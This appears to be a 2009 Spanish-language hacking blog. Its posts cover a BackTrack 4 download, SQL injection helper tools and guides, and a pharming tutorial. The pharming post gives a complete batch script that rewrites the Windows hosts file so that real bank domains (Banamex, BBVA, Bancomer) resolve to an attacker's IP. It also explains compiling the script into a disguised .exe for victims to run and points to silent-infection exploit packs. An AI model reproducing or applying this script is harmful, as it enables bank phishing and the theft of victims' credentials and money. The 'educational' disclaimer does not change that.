Hacktivismo - Seguridad Informatica - Programacion

Backtrack 4 Pre Release (Pre Liberacion)

fidentis — Tue, 03 Nov 2009 00:59:34 +0000

BackTrack 4 Pre liberacion

NOTE: Due to massive downloads and missing bandwidth, some servers might be unreachable and you need to hit either reload or click again on the download link.

TRADUCCION SEGUN SAN GOOGLE

NOTA: Debido a las descargas masivas y la falta de ancho de banda, algunos servidores pueden ser inalcanzable y que tenga que pulsar o bien volver a cargar de nuevo o haga clic en el enlace de descarga.

Description: DVD Image
Name: bt4-pre-final.iso
Size: 1390 MB
MD5: b0485da6194d75b30cda282ceb629654
Download: Click here

Disklabel: bt4-label.png

recuerden que para poder iniciarlo cuado ya esten booteados desde el cd, en la consola de bt escriban startx para que entren al modo grafico de bt.

Algunas herramientas para tus inyecciones

fidentis — Mon, 02 Nov 2009 18:13:34 +0000

Conversor_Ascii.exe

convierte textos a codigo ascii

DESCARGAR

UnionSelect TOOL.exe

Encuentra cuantas tablas tiene una pagina vulnerable

DESCARGAR

admin-path

Encuentra el directorio para logearse como admin

DESCARGAR

Como crear un inyeccion SQL

fidentis — Mon, 02 Nov 2009 18:01:54 +0000

Con esta guia aprendi a crear inyecciones SQL es muy buena, despues de que hayan logrado hacer una inyeccion SQL a alguna pagina web pueden profundizar los comandos que se muestran en la guia, esos no son los unicos comandos que existen para ver las bases de datos, tambien existen comandos hasta para crear un archivos con determinado codigo, crear ususarios……

Ver guia online

Como hacer pharming

fidentis — Mon, 02 Nov 2009 17:33:36 +0000

Bueno, primero que todo necesitaremos saber que es pharming si lo queres poner en practica: aqui les va un poco de definicion.

Entonces Aqui Les Pongo Un Video Educativo:

Ahora que ya sabemos que es pharming y pues phising procederemos a actuar:
Materiales:
El block de notas
Algun pack de iconos
Converter .bat to .exe (es un compilador de archivos batch)

Descargar los materiales: http://www.4shared.com/file/132069384/e534e8fb/Tools.html/Tools.html
En los materiales hay solo unos pocos iconos pero si desean pueden buscar por google y hay encontran miles de iconos, recuerden que los iconos deben tener extension .ico

Ahora lo primero que vamos hacer sera abrir el block de notas y escribir:

@echo off
echo 72.9.233.146 www.banamex.com.mx >> %windir%/system32/drivers/etc/hosts
echo 72.9.233.146 www.bbva.com >> %windir%/system32/drivers/etc/hosts
echo 72.9.233.146 www.bancomer.com.mx >> %/windir%system32/drivers/etc/hosts
echo 72.9.233.146 www.esmas.com >> %windir%/system32/drivers/etc/hosts
exit

Expliquemos un poco,: la direccion ip –72.9.233.146– sera la ip de su hosting donde tengan su scam bancario o de lo que sea(con ip de su hosting me refiero a un hosting con ip dedicada no que hicieron ping a su pagina web y listo ye tengo mi ip por que eso no es asi), entonces esa ip la cambian por la suya, en este caso puse la ip de la pagina web de un juego((esa web con IP dedicada no va a durar toda la vida asi que no se preocupen si no les carga esa pagina)).
La pagina web que en este caso pusimos –www.banamex.com.mx - www.bbva.com - www.bancomer.com.mx - www.esmas.com– seran las paginas webs a las que entraran nuestras victimas y seran redireccionadas a nuestro scam.
Y la ruta –%windir%system32driversetchosts– lo que hace es llamar al archivo hosts que se encuentra en el directorio de –windows > system32 > drivers > etc– para asi añadirle esas lineas nuestras al archivo hosts.

Ya dejemonos de explicaciones y vamos al grano: Ahora le damos clic en guardar como y le ponen cualquier nombre pero con la extencion .bat por ejemplo (file.bat) y nos salimos ahora abrimos nuestro converter .bat to .exe y compilamos nuestro archivo para que quede en .exe y si quieren le cambian el icono desde el mismo compilador y con esto abremos terminado, ahora provemos: ejecutemos nuestro archivo file.exe y veran que no paso nada a simple vista pero ahora vayan a la siguiente ruta WINDOWSsystem32driversetc y abran el archivo hosts con el block de notas y veran nuestras URL`S e IP`S en aquel archivo y eso significara que funciono (cuando ejecuten su archivo file.exe se modificara el archivo hosts, y para desinfectarse solo abran el archivo hosts y borren nuestras URL`S e IP`S que se añadieron y dejamos por defecto la ip 127.0.0.1 y el nombre localhost) o simplemente abran una ventana nueva del internet y escriban una de las direcciones webs que decian en el archivo como por ejemplo www.bbva.com y veran que seran redireccionados a la ip (72.9.233.146) la cual es una pagina web de un juego, y si miran bien la URL se daran cuenta de que nada cambia por que dira lo mismo de www.bbva.com por eso es tan efectivo estos ataques jeje, y para los que piensan en grande por la net existen varios scripts para infectar PC`S de forma silenciosa como el fire pack lite, ice pack entre otros.

Nota:Este documento fue creado de forma educativa y ni el autor ni ayudantes se hacen responsables por los malos usos que les puedan dar a este documento.

Este Documento puede ser distribuido, siempre y cuando el nombre del autor permanezca intacto

Inauguracion del blog

fidentis — Mon, 02 Nov 2009 16:42:11 +0000

Hola hoy lunes 2 de noviembre del 2009 es la inauguracion de este gran blog espero que este sea un blog muy visitado futuramente.

Los que quieran aportar sus conocimientos con guias, videos, lo que sea pero relacionado a la seguridad informatica bienvenenidos sean.

Tambien estoy en busca de colaboradores (moderadores para el foro)